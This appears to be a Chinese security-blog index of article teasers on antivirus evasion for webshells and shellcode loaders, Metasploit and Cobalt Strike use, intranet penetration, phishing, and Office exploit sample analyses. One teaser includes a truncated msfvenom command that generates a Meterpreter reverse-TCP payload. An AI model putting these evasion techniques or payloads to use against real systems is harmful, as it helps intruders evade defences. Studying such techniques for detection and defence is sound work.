分享 | 几种实战成功过的webshell免杀方式
0x01 php的免杀传统的php免杀不用多说了,无非就是各种变形和外部参数获取,对于一些先进的waf和防火墙来说,不论如何解析最终都会到达命令执行的地方,但是如果语法报错的话,就可能...
Read More冰蝎webshell免杀(奇淫巧计)
因前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了.......于是便有了该文章........
Read More启明星辰XDR:针对免杀C2工具的场景化检测利器
近年来,大量的后渗透利用(Post-Exploitation)工具包、自定义恶意软件和开源远程控制木马(RAT)等具备丰富的检测规避技术和反溯源能力的工具,活跃于各种实战对抗演练、勒索攻击甚至...
Read More免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)
00. 概述什么是免杀?来自百科的注解:免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”...
Read More几种实战成功过的webshell免杀方式
0x01 php的免杀传统的php免杀不用多说了,无非就是各种变形和外部参数获取,对于一些先进的waf和防火墙来说,不论如何解析最终都会到达命令执行的地方,但是如果语法报错的话,就可能...
Read More内网渗透-windows系统
前言本次内网渗透的思路为:通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后...
Read MoreShellcodeloader免杀过火绒
题记 今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。环境 Kali:192.168.0.119 win10:192.168.0.200...
Read More内网域渗透:如何找到最有效的攻击路线,进行精准域内打击
在域渗透的时候我们手动梳理域内环境需要花很大功夫,这时候通过 SharpHound 对当前机器的环境进行分析,就能够很快知道离域管最近的攻击线路,快速精准打击!一次完美的内网域渗透...
Read More利用Java反射实现加密型webshell的免杀
本文以哥斯拉和冰蝎为例,讲解如何使用反射机制来实现加密型webshell的免杀。 0x01 基础知识 反射是Java的一种动态特征。反射的存在可以让运行中的Java程序能够获取自...
Read More免杀基础原理及实践免杀
1.免杀基本概念: 免杀就是反病毒技术,,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所...
Read MoreCS shellcode内存加载器免杀及实现
相关代码以及免杀项目实现: https://github.com/crisprss/Shellcode_Memory_Loader 0x01.前言 前段时间看到小刚师傅的文章分享了几个加载器的相关实现,本篇文章在此基础上...
Read More如何用python编写shellcode并且免杀
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。大家好,今天和大家聊聊shellcode。什么是shellcode我在这里简单讲一下什么是Shellcode。Shellcode实际是一段代码(也可...
Read More初学MSF之渗透、提权、免杀(下)
写在前面最近学了学msf,学习了一些简单的模块使用以及渗透、提权、免杀,并使用靶场进行了一次小小的实战,写篇文章记录下。MSF是什么Metasploit是一个免费的、可下载的渗透测...
Read More初学MSF之渗透、提权、免杀(上)
写在前面最近学了学msf,学习了一些简单的模块使用以及渗透、提权、免 杀,并使用靶场进行了一次小小的实战,写篇文章记录下。MSF是什么Metasploit是一个免费的、可下载的渗透测...
Read More红队基操系列:流量代理、免杀钓鱼
本次渗透测试初衷是自建靶场,研究下内网流量代理及免杀马钓鱼,初步测试完后索性多做几步,形成一个较为完整的全流程渗透过程。郑重申明:本文分享的所有信息技术仅用于学习教育之...
Read MoreMetasploit免杀初探索
0x01 环境搭建测试系统:windows10 (1909)杀毒软件:360安全卫士在线杀毒:VT0x02 payload生成msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -...
Read More从剖析CS木马生成到开发免杀工具
作者:锦行-夜影实验室(安全平台部)-t43M!ne 木马是黑客实施网络攻击的常用兵器之一,有些木马可以通过免杀技术的加持躲过杀毒软件的查杀。本文由锦行科技的安全研究团队提供,旨在...
Read More深究异或webshell原理以及服务器处理免杀的流程
作者:s1mple-safety合天智汇前言 之前一直接触rce;但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马,但是今天碰到一道题,让我深刻理解了深究的重要性;不能无脑...
Read More利用python免杀cs shellcode
原创AgeloVito合天智汇0x01 前言 2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学...
Read More利用了Office公式编辑器特殊处理逻辑的最新免杀技术分析(CVE-2017-11882)
背景 2018年8月24日,360威胁情报中心捕获到一个专门为乌克兰语使用者设计的钓鱼文档:该文档为RTF文件格式,且有详细的文档内容。360威胁情报中心经过分析确认这是首次发现的针...
Read More利用了多种Office OLE特性的免杀样本分析及溯源
概述 360威胁情报中心曾在2018年2月发布了《2017中国高级持续性威胁(APT)研究报告》(详见参考资料[1]),报告指出利用Office漏洞、宏、DDE等相关技术进行APT攻击一直是APT组织的重...
Read More利用INF Script下载执行技术来进行绕过,免杀和持久化
简介INF Script执行方法使用InstallHinfSection执行INF Script脚本使用CMSTP执行INF Script脚本使用LaunchINFSection执行INF Script脚本使用和防御方法恶意软件绕过,免杀和...
Read More